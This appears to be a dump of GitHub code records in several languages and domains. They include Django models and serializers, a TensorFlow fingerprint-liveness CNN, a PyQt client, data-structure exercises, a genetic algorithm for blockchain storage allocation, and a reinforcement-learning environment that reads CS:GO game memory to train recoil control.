InuitsParticipant, on_delete=models.CASCADE, related_name=\"visum_participant\"\n )\n participant_type = DefaultCharField(\n choices=ParticipantType.choices,\n default=ParticipantType.PARTICIPANT,\n max_length=1,\n )\n payment_status = DefaultCharField(\n choices=PaymentStatus.choices, default=PaymentStatus.NOT_PAYED, max_length=1\n )\n\n class Meta:\n ordering = [\n \"participant__first_name\",\n \"participant__last_name\",\n \"participant__birth_date\",\n \"participant__group_group_admin_id\",\n ]\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n\n def equals_visum_participant(self, updated_visum_participant):\n if updated_visum_participant is None:\n return False\n\n if (\n not type(updated_visum_participant).__class__.__name__\n == self.__class__.__name__\n ):\n return False\n\n return (\n self.equals_participant(updated_visum_participant.participant)\n and self.participant_type == updated_visum_participant.participant_type\n and self.payment_status == updated_visum_participant.payment_status\n )\n\n def __str__(self):\n return \"id ({}), participant_type ({}), payment_status ({}), participant({})\".format(\n self.id, self.participant_type, self.payment_status, str(self.participant)\n )\n","repo_name":"ScoutsGidsenVL/kampvisum-backend","sub_path":"scouts_kampvisum_api/apps/participants/models/visum_participant.py","file_name":"visum_participant.py","file_ext":"py","file_size_in_byte":1913,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"39171057673","text":"def conv2d(x, W):\n return tf.nn.conv2d(x, W, strides=[1, 1, 1, 1], padding='SAME')\n\n\ndef max_pool_2x2(x):\n return tf.nn.max_pool(x, ksize=[1, 2, 2, 1],\n strides=[1, 2, 2, 1], padding='SAME')\n\ndef weight_variable(shape, unit):\n initial = tf.truncated_normal(shape,\n stddev=math.sqrt(2.0 / float(unit)))\n return tf.Variable(initial)\n\n\ndef bias_variable(shape):\n initial = tf.constant(0.1, shape=shape)\n return tf.Variable(initial)\n\n\ndef inference(images, keep):\n\n input1 = tf.reshape(images, [-1, 64, 64, 1])\n\n filter1 = weight_variable([3, 3, 1, 64], 3 * 3 * 1)\n bias1 = bias_variable([64])\n\n h_conv1 = tf.nn.relu(conv2d(input1, filter1) + bias1)\n input2 = max_pool_2x2(h_conv1)\n\n filter2 = weight_variable([3, 3, 64, 128], 3 * 3 * 64)\n bias2 = bias_variable([128])\n\n h_conv2 = tf.nn.relu(conv2d(input2, filter2) + bias2)\n input3 = max_pool_2x2(h_conv2)\n\n filter3 = weight_variable([3, 3, 128, 256], 3 * 3 * 128)\n bias3 = bias_variable([256])\n\n h_conv3 = tf.nn.relu(conv2d(input3, filter3) + bias3)\n\n filter4 = weight_variable([3, 3, 256, 128], 3 * 3 * 256)\n bias4 = bias_variable([128])\n\n h_conv4 = tf.nn.relu(conv2d(h_conv3, filter4) + bias4)\n input5 = max_pool_2x2(h_conv4)\n\n input5_flat = tf.reshape(input5, [-1, 8 * 8 * 128])\n\n\n # Linear\n with tf.name_scope('full_connect1'):\n weights = tf.Variable(\n tf.truncated_normal([8 * 8 * 128, 1024],\n stddev=1.0 / math.sqrt(float(8 * 8 * 128))),\n name='weights')\n biases = tf.Variable(tf.zeros([1024]),\n name='biases')\n tinput6 = tf.matmul(input5_flat, weights) + biases\n input6 = tf.nn.dropout(tinput6, keep)\n\n with tf.name_scope('full_connect2'):\n weights = tf.Variable(\n tf.truncated_normal([1024, 512],\n stddev=1.0 / math.sqrt(float(1024))),\n name='weights')\n biases = tf.Variable(tf.zeros([512]),\n name='biases')\n tinput7 = tf.matmul(input6, weights) + biases\n input7 = tf.nn.dropout(tinput7, keep)\n\n with tf.name_scope('softmax_linear'):\n weights = tf.Variable(\n tf.truncated_normal([512, NUM_CLASSES],\n stddev=1.0 / math.sqrt(float(512))),\n name='weights')\n biases = tf.Variable(tf.zeros([NUM_CLASSES]),\n name='biases')\n logits = tf.matmul(input7, weights) + biases\n\n return logits\n","repo_name":"botianzhe/fingerprint_liveness_detection","sub_path":"split/networkStructure.py","file_name":"networkStructure.py","file_ext":"py","file_size_in_byte":2441,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"3751601715","text":"from fbs_runtime.application_context.PyQt5 import ApplicationContext\n\nfrom PyQt5.QtCore import pyqtSignal\n\nfrom api import Api\n\nfrom dashboard import Dashboard\nfrom resources import Resources\nfrom jobs import Jobs\nfrom settings import Settings\n\nfrom interfaces.app import AppUI\nfrom interfaces.widgets import Notification, CreditHistory\n\n\nclass App(AppUI):\n def __init__(\n self, logout_signal: pyqtSignal, cxt: ApplicationContext, *args, **kwargs\n ):\n super(App, self).__init__(cxt, *args, **kwargs)\n\n self.cxt = cxt\n\n self.username = \"\"\n self.total_balance = 0\n\n self.logout_signal = logout_signal\n\n self.update_account()\n self.on_dashboard_clicked()\n\n def update_account(self):\n # fetch account information\n self._api_get_call()\n\n # update navigation credit value\n self.navigation.set_credit(self.total_balance)\n\n # update account username and credit value\n self.account.update_info(self.username, self.total_balance)\n\n def on_dashboard_clicked(self):\n self.sidebar.on_dashboard_clicked()\n self._sidebar_widget_updated(Dashboard)\n\n def on_resources_clicked(self):\n self.sidebar.on_resources_clicked()\n self._sidebar_widget_updated(Resources)\n\n def on_jobs_clicked(self):\n self.sidebar.on_jobs_clicked()\n self._sidebar_widget_updated(Jobs)\n\n def on_settings_clicked(self):\n self.sidebar.on_settings_clicked()\n self._sidebar_widget_updated(Settings)\n\n def on_notification_clicked(self):\n popup = Notification(self.cxt)\n popup.exec_()\n\n # credit history popup\n def on_credit_history_clicked(self):\n popup = CreditHistory(self.cxt)\n popup.exec_()\n\n # def on_about_clicked(self):\n # pass\n\n def on_logout_clicked(self):\n\n with Api(self.cxt, \"/auth/logout\") as account_api:\n status, res = account_api.post()\n\n if status == 200:\n self.close()\n self.logout_signal.emit()\n\n def _sidebar_widget_updated(self, widget=None):\n \"\"\"\n This is a helper function that is called *manually* by the `clicked` callback function\n attached to each of the sidebar widgets.\n\n Its purpose is to reset each sidebar widgets style to default and manage the\n widget stack\n\n :param widget: The clicked on widget that we want to instantiate\n :return: None\n \"\"\"\n\n # Deallocate current widget if it exists\n if self.main_window.stack.count():\n self.main_window.stack.currentWidget().setParent(None)\n\n if widget is not None:\n self.main_window.stack_widget = widget(self.cxt)\n self.main_window.stack.addWidget(self.main_window.stack_widget)\n else:\n # Default to dashboard I guess?\n self.main_window.stack_widget = Dashboard(self.cxt)\n self.main_window.stack.addWidget(self.main_window.stack_widget)\n\n # notification popup\n\n def _api_get_call(self):\n\n # fetch account information\n with Api(self.cxt, \"/account\") as account:\n status, res = account.get()\n\n if not res or status != 200:\n self.username = \".\"\n self.total_balance = 0\n else:\n # Insert comma here so we can default to nameless greeting if api fails.\n self.username = res[\"account\"][\"firstname\"].capitalize()\n self.total_balance = round(res[\"account\"][\"credits\"], 4)\n","repo_name":"deepmarket/PLUTO","sub_path":"src/main/python/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3557,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"31510994850","text":"from django.db import transaction\nfrom djoser.serializers import UserCreateSerializer, UserSerializer\nfrom drf_extra_fields.fields import Base64ImageField\nfrom rest_framework import serializers, status\nfrom rest_framework.exceptions import ValidationError\nfrom rest_framework.fields import SerializerMethodField\n\nfrom recipes.models import (Favorite, Ingredient, IngredientRecipe, Recipe,\n ShoppingCart, Tag)\nfrom users.models import Follow, User\n\n\nclass UserCommonFieldsSerializer(serializers.ModelSerializer):\n \"\"\"Сериализатор для общих полей пользователя.\"\"\"\n is_subscribed = serializers.BooleanField(default=False)\n\n class Meta:\n model = User\n fields = (\n 'email',\n 'id',\n 'username',\n 'first_name',\n 'last_name',\n 'is_subscribed',\n )\n\n\nclass CustomUserSerializer(UserCommonFieldsSerializer):\n \"\"\"Сериализатор пользователя.\"\"\"\n class Meta(UserCommonFieldsSerializer.Meta):\n pass\n\n\nclass CreateUserSerializer(UserCreateSerializer):\n \"\"\"Сериализатор создания пользователя.\"\"\"\n class Meta:\n model = User\n fields = ('email', 'username', 'first_name', 'last_name', 'password',)\n\n\nclass ShowSubscriptionsSerializer(UserSerializer):\n \"\"\"Сериализатор для отображения подписок.\"\"\"\n recipes = SerializerMethodField()\n recipes_count = SerializerMethodField()\n is_subscribed = serializers.SerializerMethodField()\n\n class Meta:\n model = User\n fields = (\n 'email',\n 'id',\n 'username',\n 'first_name',\n 'last_name',\n 'is_subscribed',\n 'recipes',\n 'recipes_count',\n )\n read_only_fields = ('email', 'username', 'first_name', 'last_name',)\n\n def get_is_subscribed(self, obj):\n request = self.context.get('request')\n user = request.user if request else None\n return (user is not None and user.is_authenticated) or False\n\n def validate(self, data):\n author = self.instance\n user = self.context.get('request').user\n if Follow.objects.filter(author=author, user=user).exists():\n raise ValidationError(\n detail='Подписка уже существует.',\n code=status.HTTP_400_BAD_REQUEST,\n )\n if user == author:\n raise ValidationError(\n detail='Невозможно осуществить подписку на самого себя.',\n code=status.HTTP_400_BAD_REQUEST,\n )\n return data\n\n def get_recipes_count(self, obj):\n return obj.recipes.count()\n\n def get_recipes(self, obj):\n request = self.context.get('request')\n recipes_limit = request.GET.get('recipes_limit')\n recipes = obj.recipes.all()\n if recipes_limit:\n recipes = recipes[:int(recipes_limit)]\n serializer = DemoRecipeSerializer(recipes, many=True, read_only=True)\n return serializer.data\n\n\nclass TagSerializer(serializers.ModelSerializer):\n \"\"\"Сериализатор тегов.\"\"\"\n\n class Meta:\n model = Tag\n fields = ('id', 'name', 'color', 'slug',)\n\n\nclass IngredientSerializer(serializers.ModelSerializer):\n \"\"\"Сериализатор ингредиентов.\"\"\"\n\n class Meta:\n model = Ingredient\n fields = ('id', 'name', 'measurement_unit',)\n\n\nclass IngredientRecipeSerializer(serializers.ModelSerializer):\n \"\"\"Сериализатор для отображения связи ингредиентов и рецепта.\"\"\"\n id = serializers.PrimaryKeyRelatedField(\n queryset=Ingredient.objects.all()\n )\n name = serializers.ReadOnlyField(source='ingredient.name')\n measurement_unit = serializers.ReadOnlyField(\n source='ingredient.measurement_unit'\n )\n\n class Meta:\n model = IngredientRecipe\n fields = ('id', 'name', 'measurement_unit', 'amount',)\n\n\nclass ShowRecipeSerializer(serializers.ModelSerializer):\n \"\"\"Сериализатор для чтения рецептов.\"\"\"\n tags = TagSerializer(read_only=False, many=True)\n author = UserSerializer(read_only=True, many=False)\n ingredients = IngredientRecipeSerializer(\n many=True,\n source='ingredient_amount'\n )\n is_favorited = serializers.BooleanField(default=False)\n is_in_shopping_cart = serializers.BooleanField(default=False)\n image = Base64ImageField()\n\n class Meta:\n model = Recipe\n fields = (\n 'id',\n 'tags',\n 'author',\n 'ingredients',\n 'is_favorited',\n 'is_in_shopping_cart',\n 'name',\n 'image',\n 'text',\n 'cooking_time',\n )\n\n\nclass CreateRecipeSerializer(serializers.ModelSerializer):\n \"\"\"Сериализатор для создания рецептов.\"\"\"\n ingredients = IngredientRecipeSerializer(many=True)\n tags = serializers.PrimaryKeyRelatedField(\n many=True,\n queryset=Tag.objects.all()\n )\n image = Base64ImageField()\n author = UserSerializer(read_only=True)\n\n class Meta:\n model = Recipe\n fields = (\n 'id',\n 'tags',\n 'author',\n 'ingredients',\n 'name',\n 'image',\n 'text',\n 'cooking_time',\n )\n\n @staticmethod\n def create_ingredients(recipe, ingredients):\n ingredient_list = []\n for ingredient_data in ingredients:\n ingredient_list.append(\n IngredientRecipe(\n ingredient=ingredient_data.pop('id'),\n amount=ingredient_data.pop('amount'),\n recipe=recipe,\n )\n )\n IngredientRecipe.objects.bulk_create(ingredient_list)\n\n @transaction.atomic\n def create(self, validated_data):\n request = self.context.get('request', None)\n tags = validated_data.pop('tags')\n ingredients = validated_data.pop('ingredients')\n recipe = Recipe.objects.create(author=request.user, **validated_data)\n recipe.tags.set(tags)\n self.create_ingredients(recipe, ingredients)\n return recipe\n\n @transaction.atomic\n def update(self, instance, validated_data):\n instance.tags.clear()\n IngredientRecipe.objects.filter(recipe=instance).delete()\n instance.tags.set(validated_data.pop('tags'))\n ingredients = validated_data.pop('ingredients')\n self.create_ingredients(instance, ingredients)\n return super().update(instance, validated_data)\n\n def to_representation(self, instance):\n \"\"\"Метод для представления результата сериализатора.\"\"\"\n return ShowRecipeSerializer(\n instance,\n context={'request': self.context.get('request')}\n ).data\n\n\nclass DemoRecipeSerializer(serializers.ModelSerializer):\n \"\"\"Сериализатор для упрощенного отображения модели рецепта.\"\"\"\n class Meta:\n model = Recipe\n fields = ('id', 'name', 'image', 'cooking_time',)\n\n\nclass FavoritesCartBasicSerializer(serializers.ModelSerializer):\n \"\"\"Базовый сериализатор для избранного и корзины.\"\"\"\n def to_representation(self, instance):\n \"\"\"Метод представления результата сериализатора.\"\"\"\n return DemoRecipeSerializer(\n instance.recipe,\n context={'request': self.context.get('request')}\n ).data\n\n def validate(self, data):\n \"\"\"Метод для валидации, если объект уже существует.\"\"\"\n request = self.context.get('request')\n if not request or request.user.is_anonymous:\n return False\n recipe = data['recipe']\n if self.model.objects.filter(\n user=request.user,\n recipe=recipe\n ).exists():\n raise serializers.ValidationError({'status': 'Уже существует!'})\n return data\n\n\nclass FavoriteSerializer(FavoritesCartBasicSerializer):\n \"\"\"Сериализатор для избранных рецептов.\"\"\"\n model = Favorite\n\n class Meta:\n model = Favorite\n fields = ('user', 'recipe',)\n\n\nclass ShoppingCartSerializer(FavoritesCartBasicSerializer):\n \"\"\"Сериализатор для корзины покупок.\"\"\"\n model = ShoppingCart\n\n class Meta:\n model = ShoppingCart\n fields = ('user', 'recipe',)\n","repo_name":"meveladron/foodgram-project-react","sub_path":"backend/api/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":8822,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"73521767204","text":"\"\"\"\nProszę napisać funkcję wstawiającą na koniec listy nowy element. Do\nfunkcji należy przekazać wskazanie na pierwszy element listy oraz wstawianą\nwartość.\n\nProszę napisać funkcję usuwającą ostatni element listy. Do funkcji\nnależy przekazać wskazanie na pierwszy element listy.\n\n\"\"\"\n\nclass Node:\n def __init__(self, val):\n self.val = val\n self.next = None\n\ndef wstaw(first, value):\n p = first\n r = Node(value)\n if p == None:\n return r\n\n while p != None:\n prev = p\n p = p.next\n\n prev.next = r\n return first\n\ndef usun(first):\n p = first\n if p.next == None or p == None:\n return None\n while p.next != None:\n prev = p\n p = p.next\n prev.next = None\n return first\n\n\ndef wypisz(first):\n while first is not None:\n #print(first)\n print(first.val, '--->', end='')\n first = first.next\n print()\n\n\nlista = Node(46)\nlista = wstaw(lista, 23)\nlista = wstaw(lista, 3561)\nlista = wstaw(lista,2)\nwypisz(lista)\n","repo_name":"Gygrus/WDI-ASD-course-Python","sub_path":"Semestr I/zestaw_7/cw6 i cw7.py","file_name":"cw6 i cw7.py","file_ext":"py","file_size_in_byte":1028,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"2888910562","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Dec 2 10:51:59 2022\r\nQ2_opt2\r\n@author: Lethe\r\n\"\"\"\r\n\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport random\r\n\r\nnp.random.seed(1037)\r\nrandom.seed(1225)\r\n\r\n'''\r\n随机生成区块分配方案 同时判断生成的方案是否满足基本要求\r\nnodeNum blockNum 为全局变量\r\n完全随机找到合适的值比较慢 可优化\r\n'''\r\ndef generate_blockAllo(alloNum=10): #默认生成100种分配\r\n blockAlloGen = np.zeros((alloNum,nodeNum,blockNum)).astype(bool)\r\n for i in range(alloNum):\r\n blockAllo = np.random.randint(2, size=(nodeNum,blockNum)).astype(bool)\r\n while(np.all(constraint(blockAllo))==False):\r\n blockAllo = np.random.randint(2, size=(nodeNum,blockNum)).astype(bool)\r\n blockAlloGen[i,:,:] = blockAllo\r\n\r\n return blockAlloGen\r\n\r\n'''随机生成区块 按照备份数量生成'''\r\ndef generate_blockAllo_backups(alloNum=10):\r\n blockAlloGen = np.zeros((alloNum,nodeNum,blockNum)).astype(bool)\r\n for i in range(alloNum):\r\n blockAllo = np.zeros((nodeNum,blockNum)).astype(bool)\r\n while(np.all(constraint(blockAllo))==False):\r\n blockAllo = np.zeros((nodeNum,blockNum)).astype(bool)\r\n for block in range(blockNum):\r\n nodeChoice = random.sample(range(nodeNum), blockBackups)\r\n for index in nodeChoice:\r\n blockAllo[index,block] = True\r\n blockAlloGen[i,:,:] = blockAllo\r\n \r\n return blockAlloGen\r\n\r\n'''\r\n约束条件判断\r\n输入 区块分配方案 blockAllo\r\n输出 True False\r\n其中 blockInfo blockBackups nodeInfo storageLimit 为全局变量,条件可选\r\n'''\r\ndef constraint(blockAllo, condition = -1): #-1代表所有条件,0-2代表条件1-3\r\n if(condition == -1):\r\n constraint_result = np.full(3, False, dtype=bool) #三个约束的结果 默认全False\r\n #约束条件1 每个节点的空间限制\r\n constraint_result[0] = np.all(np.dot(blockAllo,blockInfo[:,1]) <= nodeInfo[:,1]) #为True即为节点均满足要求\r\n #约束条件2 每个区块至少有blockBackups备份\r\n constraint_result[1] = np.all(blockAllo.sum(axis=0) >= blockBackups) #为True即为满足备份数量要求\r\n #约束条件3 系统总的存储空间占用率不超过限定值\r\n constraint_result[2] = (np.sum(blockAllo.sum(axis=0)*blockInfo[:,1])/np.sum(nodeInfo[:,1])<=storageLimit) #为True即为满足约束\r\n return constraint_result\r\n \r\n elif(condition == 0):\r\n return np.all(np.dot(blockAllo,blockInfo[:,1]) <= nodeInfo[:,1])\r\n \r\n elif(condition == 1):\r\n return np.all(blockAllo.sum(axis=0) >= blockBackups)\r\n \r\n elif(condition == 2):\r\n return np.sum(blockAllo.sum(axis=0)*blockInfo[:,1])/np.sum(nodeInfo[:,1])<=storageLimit\r\n \r\n\r\n'''\r\n计算目标函数\r\n全局变量 costAll\r\n'''\r\ndef objective(blockAllo):\r\n nodeBlockCost = np.zeros((nodeNum,blockNum)) #节点访问区块的代价,行代表节点,列代表区块\r\n for node in range(nodeNum):\r\n for block in range(blockNum):\r\n nodeBlockCost[node,block] = np.min(costAll[block,blockAllo[:,block]==1,node]) #选出通信成本最小的节点所需成本\r\n nodeProportion = np.dot(blockAllo,blockInfo[:,1])/nodeInfo[:,1] #节点存储空间占总空间的比例\r\n nodeProportion = (np.exp(5*nodeProportion)-1)/(np.exp(5)-1)*10 #按照指定函数对空间占用率进行处理\r\n \r\n #分别为 通信成本 存储平衡度 总目标\r\n #计算总目标时乘以 1/区块数量\r\n result = np.array([np.sum(nodeBlockCost),np.sum(nodeProportion),(np.sum(nodeBlockCost)+np.sum(nodeProportion))/nodeNum])\r\n return result\r\n\r\n'''计算个体的适应度'''\r\ndef cal_fitness(blockAlloGen):\r\n alloNum = blockAlloGen.shape[0]\r\n #行代表一种分配/个体 列依次为 适应度 通信成本 存储平衡度 总目标\r\n alloFit = np.zeros((alloNum,4)) \r\n for index,blockAllo in enumerate(blockAlloGen): #遍历\r\n alloFit[index,1:] = objective(blockAllo)\r\n \r\n alloFit[:,0] = -(alloFit[:,3]-np.max(alloFit[:,3]))+1e-3 #计算适应度 适应度为正数\r\n return alloFit\r\n\r\n'''选择一定数量的个体'''\r\ndef select(blockAlloGen, alloFit, selectSize=1):\r\n idx = np.random.choice(np.arange(alloFit.shape[0]), size=selectSize, replace=False, #replace代表是否能重复抽取\r\n p=(alloFit[:,0])/(alloFit[:,0].sum()) )\r\n return blockAlloGen[idx,:,:],alloFit[idx,:]\r\n\r\n'''交叉变异'''\r\ndef crossover_mutation(blockAlloGen, CROSSOVER_RATE=0.8, MUTATION_RATE=0.5):\r\n blockAlloNew = []\r\n alloSize = blockAlloGen.shape[0]\r\n crossover_flag, mutation_flag = 0,0\r\n for alloFa in blockAlloGen:\t\t#遍历种群中的每一个个体,将该个体作为父亲\r\n blockAlloNew.append(alloFa)\r\n alloChild = alloFa.copy()\t\t#孩子先得到父亲的全部基因\r\n #交叉\r\n if np.random.rand() < CROSSOVER_RATE:\t\t\t#以一定的概率发生交叉\r\n crossover_flag = 1\r\n alloMa = blockAlloGen[np.random.randint(alloSize),:,:]\t#再种群中选择另一个个体,并将该个体作为母亲\r\n crossPoints = np.random.randint(low=0, high=blockNum, size=nodeNum)\t#随机产生交叉的点\r\n for i in range(nodeNum): #按照行交叉\r\n alloChild[i,crossPoints[i]:] = alloMa[i,crossPoints[i]:] #孩子得到位于交叉点后的母亲的基因 \r\n #变异\r\n if np.random.rand() < MUTATION_RATE: \t\t\t\t#以MUTATION_RATE的概率进行变异\r\n mutation_flag = 1\r\n mutate_block = np.random.randint(0, blockNum)\t#随机产生一个实数 代表要变异基因的位置/列\r\n mutate_node = np.random.randint(0, nodeNum)\t#随机产生一个实数 代表要变异基因的位置/行\r\n alloChild[mutate_node, mutate_block] = alloChild[mutate_node, mutate_block]^1 \t#将变异点的二进制为反转\r\n \r\n # if np.all(constraint(alloChild))==True:\r\n # print('产生子代')\r\n # blockAlloNew.append(alloChild) #若交叉后的个体不满足约束条件 则不进行交叉\r\n if(crossover_flag|mutation_flag):\r\n constraint_result = constraint(alloChild)\r\n #大多数是因为第1个条件不满足要求\r\n #print(constraint_result)\r\n if(constraint_result[1]==False):\r\n alloChild = fix_constraint1(alloChild)\r\n constraint_result = constraint(alloChild)\r\n if np.all(constraint_result):\r\n blockAlloNew.append(alloChild)\r\n \r\n crossover_flag, mutation_flag = 0,0\r\n\r\n return np.array(blockAlloNew)\r\n\r\n\r\n'''\r\n对交叉变异后不满足条件1的情况进行修复(0-2)\r\n'''\r\ndef fix_constraint1(blockAllo):\r\n \r\n num = blockAllo.sum(axis=0) #该分配每个区块的数量\r\n for index,block in enumerate(num):\r\n if block<blockBackups:\r\n idx = np.random.choice(np.where(blockAllo[:,index]==False)[0], size=blockBackups-block, replace=False) #replace代表是否能重复抽取\r\n for i in idx:\r\n blockAllo[i,index] = True \r\n \r\n return blockAllo\r\n\r\nif __name__==\"__main__\":\r\n '''区块信息 节点信息 约束要求'''\r\n blockBackups = 3 #区块备份数量 至少为1\r\n storageLimit = 0.8 #优化后系统总存储空间占比\r\n #区块信息\r\n blockInfo = np.loadtxt('E:/PythonProject/BlockchainStorage/data/blockInfo30.csv', delimiter=',')\r\n blockNum = blockInfo.shape[0] #区块数量\r\n #节点信息\r\n nodeInfo = np.loadtxt('E:/PythonProject/BlockchainStorage/data/nodeInfo10.csv', delimiter=',')\r\n nodeNum = nodeInfo.shape[0] #节点数量\r\n \r\n print('Start...')\r\n print('Allocate {0} blocks to {1} peers.\\nBlock backup is {2}.\\nStorage optimization target is {3}.'.format(blockNum,nodeNum,blockBackups,storageLimit))\r\n \r\n #所有节点需要的花销shape=(blockNum,nodeNum,nodeNum)\r\n costAll = (blockInfo[:,1]*blockInfo[:,2]).reshape((blockNum,1,1)) * nodeInfo[:,2:].reshape((1,nodeNum,nodeNum))\r\n \r\n '''遗传算法信息'''\r\n epochNum = 100 #迭代次数\r\n bestBlockAllo = np.zeros((nodeNum,blockNum)).astype(bool) #目前最优分配\r\n alloFitEpoch = np.zeros((epochNum+1,3)) #每轮训练的最优结果 通信成本 存储平衡度 总目标\r\n \r\n #原始种群\r\n alloNum = 50 #种群数量\r\n #blockAlloGen = generate_blockAllo(alloNum) #生成原始种群\r\n blockAlloGen = generate_blockAllo_backups(alloNum)\r\n alloFit = cal_fitness(blockAlloGen) #计算原始种群的 总目标 适应度\r\n alloFitEpoch[0,:] = alloFit[np.argmin(alloFit[:,3]),1:]\r\n print('原始种群最大值',alloFit[np.argmax(alloFit[:,3]),-1])\r\n \r\n #迭代\r\n for epoch in range(epochNum):\r\n print('Epoch',epoch)\r\n \r\n blockAlloGen = crossover_mutation(blockAlloGen, CROSSOVER_RATE=0.8) #交叉变异\r\n print('Population size',blockAlloGen.shape[0])\r\n alloFit = cal_fitness(blockAlloGen) #计算种群适应度\r\n blockAlloGen,alloFit = select(blockAlloGen, alloFit, selectSize=alloNum) #选择个体\r\n alloFitEpoch[epoch+1,:] = alloFit[np.argmin(alloFit[:,3]),1:] #这一轮的最优值\r\n print('Current best',alloFitEpoch[epoch+1,:])\r\n bestBlockAllo = blockAlloGen[np.argmin(alloFit[:,3]),:,:] #这一轮的最优分配\r\n \r\n #结果\r\n plt.plot(range(epochNum+1), alloFitEpoch[:,2],'.-')\r\n #print(bestBlockAllo)\r\n \r\n \r\n \r\n\r\n\r\n","repo_name":"nick887/block_chain_storage","sub_path":"Q2_GA_opt/Q2_GA_opt1.py","file_name":"Q2_GA_opt1.py","file_ext":"py","file_size_in_byte":9610,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"41941098623","text":"import time\n\nfrom stable_baselines3 import A2C\nimport gym\nfrom gym import spaces\nfrom gsi.server import GSIServer\nimport pymem\nimport mouse\nimport numpy as np\n\nfrom telnet_client.csgo_telnet_client import CSGOTelnetClient\n\nY_ANG_ADDR_OFFSET = 0x4dc4aec\nX_ANG_ADDR_OFFSET = Y_ANG_ADDR_OFFSET+4\n\nclass CSGOEnvironment(gym.Env):\n \"\"\"Custom Environment that follows gym interface\"\"\"\n metadata = {'render.modes': ['human']}\n\n def __init__(self, timescale=4, render_mode: str = None):\n assert render_mode is None or render_mode in self.metadata[\"render.modes\"]\n # Define action and observation space\n self.action_space = spaces.Box(low=-1, high=1, shape=(2,))\n self.observation_space = spaces.Box(low=np.array([-180, -90]), high=np.array([180, 90]), shape=(2,))\n\n self.timescale = timescale\n\n self.server = GSIServer((\"127.0.0.1\", 3000), \"S8RL9Z6Y22TYQK45JB4V8PHRJJMD9DS9\")\n self.server.start_server()\n\n self.pm = pymem.Pymem(\"csgo.exe\")\n self.client = pymem.process.module_from_name(self.pm.process_handle, \"client.dll\").lpBaseOfDll\n \n self.telnet_client = CSGOTelnetClient()\n self.telnet_client.connect()\n\n self.telnet_client.run(\"exec bot\")\n self.telnet_client.run(f\"host_timescale {timescale}\")\n\n self.step_counter = 0\n\n\n def _get_obs(self):\n x_angle = np.float32(round(self.pm.read_float(self.client+X_ANG_ADDR_OFFSET), 2) - self.initial_state[0])\n y_angle = np.float32(round(self.pm.read_float(self.client+Y_ANG_ADDR_OFFSET), 2) - self.initial_state[1])\n return np.array([x_angle, y_angle])\n\n def reset(self):\n self.step_counter = 0\n mouse.release()\n time.sleep(1/self.timescale) # There is a cooldown for the kill command\n self.telnet_client.run(\"kill\")\n time.sleep(2/self.timescale)\n\n self.telnet_client.run(\"slot1\")\n self.telnet_client.run(\"setang 0 -98\")\n self.telnet_client.run(\"r_cleardecals\")\n\n mouse.hold()\n self.initial_state = np.zeros((2,), dtype=np.float32)\n observation = self._get_obs()\n self.initial_state = observation\n return observation\n\n def step(self, action):\n self.step_counter += 1\n \n ak47_key, ak_47 = [(key, weapon) for key, weapon in self.server.gamestate.player.weapons.items() if weapon[\"name\"] == \"weapon_ak47\"][0]\n ammo = ak_47[\"ammo_clip\"]\n # reloading = ak_47[\"state\"] == \"reloading\"\n \n mouse.move(action[0]*100, action[1]*100, absolute=False)\n \n observation = self._get_obs()\n sq = observation[0] ** 2 + observation[1] ** 2\n\n current_ammo = ammo\n\n done = current_ammo == 0\n\n # Wait for next bullet to be fired\n while current_ammo == ammo: # current_ammo >= ammo - N, where N is the number of bullets to wait until taking action\n ak_47 = self.server.gamestate.player.weapons[ak47_key]\n current_ammo = ak_47[\"ammo_clip\"]\n done = current_ammo == 0\n if done: break\n time.sleep(0.005)\n \n\n # if sq < 230:\n # if sq < 1:\n # reward = 100/max(sq, 0.01)\n # else:\n # reward = -sq * 5\n # reward += 100/max(30-ammo, 0.01)\n # else:\n # reward = -200000\n\n if sq < 10:\n reward = 10/max(sq, 0.1)\n else:\n reward = -sq\n\n # print(ammo, reward, action[0], action[1])\n\n if (done):\n print(done)\n\n \n\n # print(self.step_counter, reward, [action[0]*100, action[1]*100])\n\n return observation, reward, done, {}\n \n def close(self):\n mouse.release()\n\n def render(self, mode=\"\"):\n pass\n\nif __name__ == \"__main__\":\n env = CSGOEnvironment(timescale=1)\n model = A2C()\n","repo_name":"stephancill/eee4118-csgo-project","sub_path":"src/custom_gym/csgo_environment.py","file_name":"csgo_environment.py","file_ext":"py","file_size_in_byte":3863,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"71847615204","text":"import time\n\ndef opti_bubble(data, drawdata, speed):\n\n n = len(data)\n update = True\n j = 0\n while (update==True and n > 1):\n update = False\n for i in range(len(data)-j -1):\n if data[i] > data[i+1]:\n data[i], data[i+1] = data[i+1], data[i]\n drawdata(data, ['red' if x == i or x == i+1 else ['black'] for x in range(len(data))])\n time.sleep(speed)\n update = True\n else:\n i += 1\n n -= 1\n j += 1\n drawdata(data, ['green' for x in range(len(data))])\n\n return data","repo_name":"JordinaGR/sorting-algs-visualization","sub_path":"algs/opti_bubble_sort.py","file_name":"opti_bubble_sort.py","file_ext":"py","file_size_in_byte":669,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"52"} +{"seq_id":"8611003330","text":"import itertools\nimport torch\nimport gpytorch\nimport math\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom scipy.integrate import solve_ivp\n\ndef solveLotkaVolterra(_phi, _beta, _c, _T, _k, _nb_t=200000):\n _ts = np.linspace(0, _T, _nb_t)\n _a = np.array([_phi, -_beta, -_beta*_beta*_c])\n \n _b = np.array([0, -_beta, _beta])\n \n _A = np.array([[-1, _c, 1/_beta],\n [-1, _c, 1/_beta],\n [-1, _c, 1/_beta]])/2/_k\n \n _Gt = lambda t, s: -_a + -np.diag(s) @ (_b 